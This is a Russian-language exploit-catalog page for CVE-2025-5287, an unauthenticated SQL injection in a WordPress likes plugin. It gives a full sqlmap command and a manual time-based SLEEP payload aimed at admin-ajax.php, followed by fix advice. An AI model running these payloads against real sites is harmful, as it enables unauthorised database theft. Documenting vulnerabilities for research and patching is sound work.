Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5287 — Плагин WordPress Likes and Dislikes Plugin <= 1.0.0 уязвим к SQL-инъекции. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-5287
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-5287

CVE-2025-5287

Плагин WordPress Likes and Dislikes Plugin <= 1.0.0 уязвим к SQL-инъекции.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 Плагин WordPress Likes and Dislikes ≤ 1.0.0 — Неаутентифицированная SQL-инъекция

🧠 CVE ID: CVE-2025-5287

Обнаружил: Khaled_Alenazi (Nxploited)   Опубликовано: 27 мая 2025 г.


📋 Описание

Плагин Likes and Dislikes для WordPress уязвим к SQL-инъекциям через параметр post во всех версиях вплоть до 1.0.0 включительно.   Из-за недостаточного экранирования и отсутствия подготовленных выражений неаутентифицированные злоумышленники могут внедрять сырой SQL в серверные запросы, что приводит к утечке или изменению данных.


🧬 Технические детали

  • Уязвимый параметр: post
  • Тип уязвимости: SQL-инъекция (Boolean-based и Time-based)
  • HTTP-метод: POST
  • Затронутый эндпоинт: /wp-admin/admin-ajax.php
  • Статус исправления: ❌ Не исправлено
  • Требуемые привилегии: Нет (без аутентификации)
  • Оценка CVSS: 9.3 (Высокая)
  • OWASP Top 10: A1 — Инъекции

💥 Эксплуатация

✅ Команда SQLMap (Time-based Blind SQLi):

root@kitploit:~
sqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs

Эта команда подтверждает точку инъекции и перечисляет базы данных с помощью time-based техники.

🧪 POC-Payload (вручную — Time-based):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close

action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like

🧪 Сводка доказательств

  1. Перечисление с помощью SQLMap:    - Обнаружены boolean-based blind и time-based blind SQLi.    - Подтверждено, что серверная СУБД — MySQL.    - Перечислены базы данных: db, test, information_schema.

   Доказательство SQLMap

  1. Ручная проверка с помощью Burp Suite:    - Задержка HTTP-ответа подтверждена с помощью time-based payload.    - Задержка превысила 15 секунд, что указывает на реальную инъекцию.

   Доказательство Burp Suite


⚠️ Риски

  • Серьёзность по CVSS: 9.3 (Высокая)
  • Эта уязвимость может быть использована для извлечения конфиденциальных данных без аутентификации.

🔗 Ссылки

  • https://patchstack.com/database/wordpress/plugin/inprosysmedia-likes-dislikes-post/vulnerability/wordpress-likes-and-dislikes-plugin-plugin-1-0-0-unauthenticated-sql-injection-vulnerability
  • https://nvd.nist.gov/vuln/detail/CVE-2025-5287

🛡️ Рекомендации

  • Немедленно очищайте и параметризуйте ввод из post.
  • Используйте prepared statements (подготовленные выражения).
  • Внедрите WAF и rate-limiting (ограничение частоты запросов), чтобы снизить количество попыток подбора при инъекциях.

⚠️ Отказ от ответственности

Данный материал предоставлен только в образовательных и исследовательских целях.   Автор не одобряет вредоносную деятельность или эксплуатацию систем без явного разрешения.


👤 Автор

Khaled_Alenazi (Nxploited)

Скачать инструмент